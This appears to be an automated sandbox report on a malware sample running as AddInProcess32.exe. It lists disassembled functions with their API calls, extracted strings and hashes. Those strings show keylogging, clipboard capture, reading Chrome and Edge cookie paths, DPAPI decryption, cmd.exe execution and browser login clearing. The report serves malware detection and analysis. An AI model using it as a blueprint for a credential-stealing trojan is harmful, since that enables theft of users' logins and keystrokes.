                                                                                                Function 00413A90 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum$InfoQueryValue
                                                                                                • String ID: [regsplt]
                                                                                                • API String ID: 3554306468-4262303796
                                                                                                • Opcode ID: de06cbc2e6884f3056975f6b9d13e2a90977426a4895cc59e20832565893715a
                                                                                                • Instruction ID: fa843d34e07254c46a29a5d4d7bbb73928c81f50e0ccc4a220fcc0531dc04ae2
                                                                                                • Opcode Fuzzy Hash: de06cbc2e6884f3056975f6b9d13e2a90977426a4895cc59e20832565893715a
                                                                                                • Instruction Fuzzy Hash: DF512C72900219AADB11EB95DC86EEEB77DAF04304F1000BAE505F6191EF746B48CBA9
                                                                                                Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00443515
                                                                                                • _free.LIBCMT ref: 004435E0
                                                                                                • _free.LIBCMT ref: 004435EA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                • API String ID: 2506810119-760905667
                                                                                                • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                • String ID: /sort "Visit Time" /stext "$@NG
                                                                                                • API String ID: 368326130-3944316004
                                                                                                • Opcode ID: 2c1cea0d9a4bdc8569204e9d989fb37bac3133a136c475b647ab692b9f678ada
                                                                                                • Instruction ID: 88307c0d9f74f86904655d2c31cb74d6ebeba16a9e6c7dae8368527950f1c452
                                                                                                • Opcode Fuzzy Hash: 2c1cea0d9a4bdc8569204e9d989fb37bac3133a136c475b647ab692b9f678ada
                                                                                                • Instruction Fuzzy Hash: EB316171A001195ACB15FBA6DC969ED7375AF90308F00007FF60AB71E2EF785E49CA99
                                                                                                Function 0040B783 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Init_thread_footer__onexit
                                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]$ mG
                                                                                                • API String ID: 1881088180-2322839566
                                                                                                • Opcode ID: c61068d21ac032f18215751772468f7d7b44ffa9b06701de1bf585ad00b0d9f6
                                                                                                • Instruction ID: 5c7e69c9d376070a9f10adc198010d279a990252db190bacd7f595afc81a80c0
                                                                                                • Opcode Fuzzy Hash: c61068d21ac032f18215751772468f7d7b44ffa9b06701de1bf585ad00b0d9f6
                                                                                                • Instruction Fuzzy Hash: B5216D31A102198ACB14FBA6D8929EDB375AF54318F10403FE506771E2EF7C6D4ACA8C
                                                                                                Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                                                Strings
                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                • API String ID: 1174141254-1980882731
                                                                                                • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                                                Strings
                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                • API String ID: 1174141254-1980882731
                                                                                                • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                                Function 0040B19F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                • wsprintfW.USER32 ref: 0040B22E
                                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventLocalTimewsprintf
                                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                • API String ID: 1497725170-1359877963
                                                                                                • Opcode ID: e4e80c38991401544eba045930c100d15cf6e97299938fe7d3766f164e501aec
                                                                                                • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                • Opcode Fuzzy Hash: e4e80c38991401544eba045930c100d15cf6e97299938fe7d3766f164e501aec
                                                                                                • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                                Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                                • String ID: Online Keylogger Started
                                                                                                • API String ID: 112202259-1258561607
                                                                                                • Opcode ID: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                                                                • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                • Opcode Fuzzy Hash: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                                                                • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: CryptUnprotectData$crypt32
                                                                                                • API String ID: 2574300362-2380590389
                                                                                                • Opcode ID: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                                                                                • Instruction ID: 345ee013d26fc91f442c93551971226c597518e80cf45168a44a65f4e30a47e9
                                                                                                • Opcode Fuzzy Hash: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                                                                                • Instruction Fuzzy Hash: 1D01F575A00215BBCB18CFAC8C409AF7BB8EB85300F0041BEE94AE3381DA34AD00CB94
                                                                                                Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                                • String ID: Connection Timeout
                                                                                                • API String ID: 2055531096-499159329
                                                                                                • Opcode ID: 84b80ad7d3cdc11d311d6a55cfd00aa66ecc2c725afd842c636cda6babbb0f1b
                                                                                                • Instruction ID: 0252d74fe4ede7253ae2eff4a1d35319ac7a80acec65437dc80477e116da68d3
                                                                                                • Opcode Fuzzy Hash: 84b80ad7d3cdc11d311d6a55cfd00aa66ecc2c725afd842c636cda6babbb0f1b
                                                                                                • Instruction Fuzzy Hash: 4A01F530A40F00AFD7216F368D8642BBFE0EB00306704093FE68356AE2D6789800CF89
                                                                                                Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2005118841-1866435925
                                                                                                • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 3628047217-1405518554
                                                                                                • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                                                                                  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                                                • String ID: !D@
                                                                                                • API String ID: 3446828153-604454484
                                                                                                • Opcode ID: 497e490943b2111c41ddb6726af41986e5b3084aa378fe07644eb31d01a5d06b
                                                                                                • Instruction ID: b1493b377ee00385912555b1a5c9642ee05cd41efde33f67b603c236d656be44
                                                                                                • Opcode Fuzzy Hash: 497e490943b2111c41ddb6726af41986e5b3084aa378fe07644eb31d01a5d06b
                                                                                                • Instruction Fuzzy Hash: 81F03A70148340AAD720AF65ED55BBABB69EB54301F01487BFA09C20F2DB389C94869E
                                                                                                Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: /C $cmd.exe$open
                                                                                                • API String ID: 587946157-3896048727
                                                                                                • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,004752E8,00475300,?,pth_unenc), ref: 0040B8F6
                                                                                                • UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                                                                                • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 3123878439-4028850238
                                                                                                • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                                • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                                Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: GetCursorInfo$User32.dll
                                                                                                • API String ID: 1646373207-2714051624
                                                                                                • Opcode ID: 614bc808d894a367532beb2bc66ad03cac91d94fb46ece2cb469b05dff719b88
                                                                                                • Instruction ID: dd969ba971dbaa29921178884ad428293cf5128bfb63f122c38d39e9abecacc1
                                                                                                • Opcode Fuzzy Hash: 614bc808d894a367532beb2bc66ad03cac91d94fb46ece2cb469b05dff719b88
                                                                                                • Instruction Fuzzy Hash: 3EB09B74541740FB8F102B745D4D5153525A604703B100475F041D6151D7B584009A1E
                                                                                                Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: GetLastInputInfo$User32.dll
                                                                                                • API String ID: 2574300362-1519888992
                                                                                                • Opcode ID: 18b660a6896881f55a37715fd795c0b5131e5868884107d4762215e755f28e2f
                                                                                                • Instruction ID: c0691e7ba4e037ba5be4177d0f13c81de84985c40ff74287bb3597843e96be7a
                                                                                                • Opcode Fuzzy Hash: 18b660a6896881f55a37715fd795c0b5131e5868884107d4762215e755f28e2f
                                                                                                • Instruction Fuzzy Hash: 5FB092B8580340FBCB002BA0AD4E91E3A64AA18703B1008ABF041D21A1EBB888009F2F
                                                                                                Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 1036877536-0
                                                                                                • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F60), ref: 00404DB3
                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,00474F08,00000000,00000000), ref: 00404DC7
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                                                                • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DDB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3360349984-0
                                                                                                • Opcode ID: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                                                                • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                • Opcode Fuzzy Hash: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                                                                • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                • API String ID: 3472027048-1236744412
